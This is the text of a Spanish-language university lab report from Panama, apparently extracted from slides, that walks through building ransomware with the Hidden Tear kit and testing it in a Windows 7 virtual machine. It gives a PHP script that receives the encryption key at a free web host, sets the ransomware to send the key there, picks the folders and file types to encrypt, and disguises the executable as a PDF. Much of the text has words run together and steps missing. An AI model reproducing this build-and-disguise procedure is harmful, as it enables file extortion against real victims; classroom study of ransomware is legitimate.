El ransomware en resumen es un malware que consiste en “secuestrar” los archivos de la PC víctima a cambio de dinero, diversión o con el fin de hacerle un daño a la persona o compañía cifrando a través de un programa o código los archivos de la computadora impidiendo su lectura, escritura y/o ejecución. Estos generalmente son encriptados y la única forma de poder recuperar dichos archivos es desbloqueando los archivos mediante contraseña, o desencriptándolo mediante algún algoritmo o aplicación específica.
En esta guía estaremos demostrando de manera breve cómo éste se aplica en la práctica.
Para ello, estaremos utilizando nuestra máquina real, en nuestro caso Windows 10 y una máquina virtual de Windows 7.
1. Universidad Tecnológica de Panamá
Facultadde Ingenieríade Sistemas Computacionales
Licenciatura en Redes Informáticas
Tópicos Especiales I
II Semestre 2016
Integrantes:
Manuel Samudio 8-881-1550
Eduardo Estribí 8-888-2170
Profesor:
José Moreno
Grupo:
11R 131
Trabajo Grupal
Ransomware
2. El ransomware enresumenesunmalware que consiste en“secuestrar”losarchivosde laPC víctimaa
cambiode dinero,diversiónoconel finde hacerle undañoa la personao compañía cifrandoa travésde
un programao códigolos archivosde la computadoraimpidiendosulectura,escrituray/oejecución.
Estos generalmente sonencriptadosylaúnicaformade poderrecuperardichosarchivoses
desbloqueando losarchivosmediantecontraseña, odesencriptándolomediante algún algoritmoo
aplicación específica.
En estaguía estaremos demostrandode manerabreve cómoéste se aplicaenlapráctica.
Para ello,estaremos utilizandonuestramáquinareal,ennuestrocasoWindows10y una máquina
virtual de Windows7.
Trabajando con nuestra máquina real:
Lo primeroque debemos haceresira la siguiente páginaweb:
https://www.000webhost.com/
ClickenSignUp forFREE!
9. Luegode esto, nos situamosnuevamente ennuestrositioweb,
creamosahí mismoenlanube,enla carpetapublic_html unarchivollamadowritercon extensión.php
con el siguiente código:
<?php
$myfile =fopen("newfile.txt","w") ordie("Unable toopenfile!");
$txt = $_GET["info"]."n";
fwrite($myfile,$txt);
fclose($myfile);
?>
Este pequeñocódigonosservirámásadelante paragenerarunacontraseña. Esto loveremosmás
adelante.
Y lo subimostambiénenlacarpetaactual de nuestrositio123
11. Ahora trabajaremos con la máquina virtual de Windows7:
Instalamos lossiguientesprogramas ennuestramáquinavirtual Windows7:
Y ademásvamosa descomprimirel siguiente archivo:
Adicionalmentevamosacrear una carpetanuevaenel escritoriollamada victimalacual moveremos
algunosarchivoscomoimágenesyotrotipode archivoscomo .mp3 para aplicarle el ransomware.
12. Ahoravamos a trabajar enlosarchivosde configuracióndel HiddenTearparacrear un archivo
ejecutable de tal formaque al darle clickcifre losarchivosde la víctimade manera automática.
Ya una vezdescomprimidoel archivoHidden-Tear
AbrimoslaaplicaciónXamarinStudioque instalamos
15. Lo primeroque hacemosdentrodel archive de configuraciónescolocarnuestrapáginawebque
creamos,esdecir,reemplazamosel que estápordefecto:
El sitiowebque creamoses:
https://misitioweb123.000webhostapp.com/
Entonces,reemplazamoslainformaciónagregándole ademásel archivo writer.phpque subimos
anteriormente anuestrositioweb.
Es decir:
https://misitioweb123.000webhostapp.com/writer.php
Quedaríaentoncesalgocomoesto:
“https://misitioweb123.000webhostapp.com/writer.php?info=”
16. Editamoslalínea 175 como lomuestrala figurade abajo y colocamosen vezde test, la carpetavictima.
17. En el directorioque especificamosenlalinea186 indicaque una vezejecutadoel archivocrearáun
documento.txtconel nombre ALERTAAAA lacual contendráel mensaje que aparece abajo,Fileshas
beenencryptedwithhiddentear.
Este mensaje lopodemosmodificaranuestrogusto.
Cocaremosentoncesunmensaje personalizado.
En estaimagende abajo ,justoen lalinea153 vemoslostiposde archivosque seráncifradospor el
ransomware,le agregamoslaextensiónmp3paraque tambiéncifre este tipode archivos.
18.
19. Ya se generó nuestroarchive ejecutable.
Éste archivo lopodemosencontrarenlacarpeta
hidden-tear-master/hidden-tear/hidden-tear/bin/Debug
El archivose llamahidden-tearycontiene el locode adobe acrobadreaderpdf
A simple vistaparece unarchivoPDF,perorealmente noloes.
Este es el archivoejecutable lacual lavíctimava a ejecutary al darle clickse le cifraránlosarchivos,
específicamente lacarpetavíctimaque indicamosenel archivode configuración.
20. Lo que haremosescopiar este archivoypegarloenel escritorio.
Ahorale daremosdoble click a este archivoyveremosque losarchivosque contiene lacarpetavíctima
han cambiadosuformato. Nosdamos cuentaque no podemosabrirningúnarchivo.Losarchivoshan
sidosecuestrados(Encriptados).
23. Si vamos a nuestrapc real,y nossituamosenla carpetadonde estánuestrositioweb,le damos
entoncesal botónactualizar:
24. Y veremosque se creóun nuevoarchivo.txtllamadonewfile.txt
Este archivo contiene lacontraseñaparadesencriptarlosarchivos.
25. Ahora, volviendoanuestramáquinavirtual de Windows7, si deseamosdesencriptarodesbloquear
dichosarchivos,debemosirnosalacarpeta hiddenteardecryptor.
Abrimosel archivoque muestralaimagende abajo,con el programaxamarinstudio:
27. Ya se ha generadolaaplicaciónparadesencriptar losarchivos.
La aplicaciónse encuentraenel siguientedirectorio:
hidden-tear-masterhidden-tear-decrypterhidden-tear-decrypterbinDebug